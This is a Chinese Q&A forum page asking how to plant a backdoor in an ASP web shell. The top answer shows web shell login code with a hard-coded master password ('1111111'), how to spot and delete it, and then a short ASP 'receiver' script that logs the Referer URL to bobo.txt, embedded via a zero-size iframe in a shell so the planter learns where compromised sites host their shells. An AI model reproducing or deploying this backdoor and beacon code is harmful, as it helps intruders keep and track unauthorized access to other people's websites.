永发信息网

怎么在asp木马上留后门

答案:3  悬赏:50  手机版
解决时间 2021-01-03 13:11
  • 提问者网友:鼻尖触碰
  • 2021-01-03 03:27
怎么在asp木马上留后门
听说有这个后门但是怎么在asp木马中留后门
要什么代码么
有会的介绍一下
最佳答案
  • 五星知识达人网友:千夜
  • 2021-01-07 00:00
通常加了后门的为了隐秘性,都会加密!所以首先我们要先解密 asp木马解密工具解密后先检查有无万能密码,也就是说就算你改了木马的密码,他也能用这个密码来登录正常的:EnD fUNCtIONIF SEssIoN("web2a2dmin")<>UsERpaSs thEnIF requeSt.FoRM("pass")<>"" TheNiF REquesT.foRM("pass")=uSERPASS ThenSEsSIoN("web2a2dmin")=uSERPAssrESPOnsE.rEdirEct UrlELserrs"对不起,密码验证失败!"加有万能密码的:EnD fUNCtIONIF SEssIoN("web2a2dmin")<>UsERpaSs thEnIF requeSt.FoRM("pass")<>"" TheNiF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" ThenSEsSIoN("web2a2dmin")=uSERPAssrESPOnsE.rEdirEct UrlELserrs"对不起,密码验证失败!"1111111就是传说中的万能密码了。找到万能密码代码后把or request.form("pass")="1111111" 删除就OK了!下面来找马大多数都喜欢用框架挂马:找到后删了,到此asp后门就算剔除了!下面教大家后门的原理:这是一段收信的asp代码将其保存为1.asp<%url=Request.ServerVariables("HTTP_Referer")set fs=server.CreateObject("Scripting.FileSystemObject")set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True)file.writeline urlfile.closeset file=nothingset fs=nothing%>代码基本意思就是:“HTTP_REFERER” 链接到当前页面的前一页面的 URL 地址简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里上传到空间比如 http://127.0.0.1/1.asp然后里用http://127.0.0.1/1.asp width=0 height=0>插到asp木马中那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了
全部回答
  • 1楼网友:傲气稳了全场
  • 2021-01-07 01:47
海端asp木马有
我要举报
如以上回答内容为低俗、色情、不良、暴力、侵权、涉及违法等信息,可以点下面链接进行举报!
点此我要举报以上问答信息
大家都在看
推荐资讯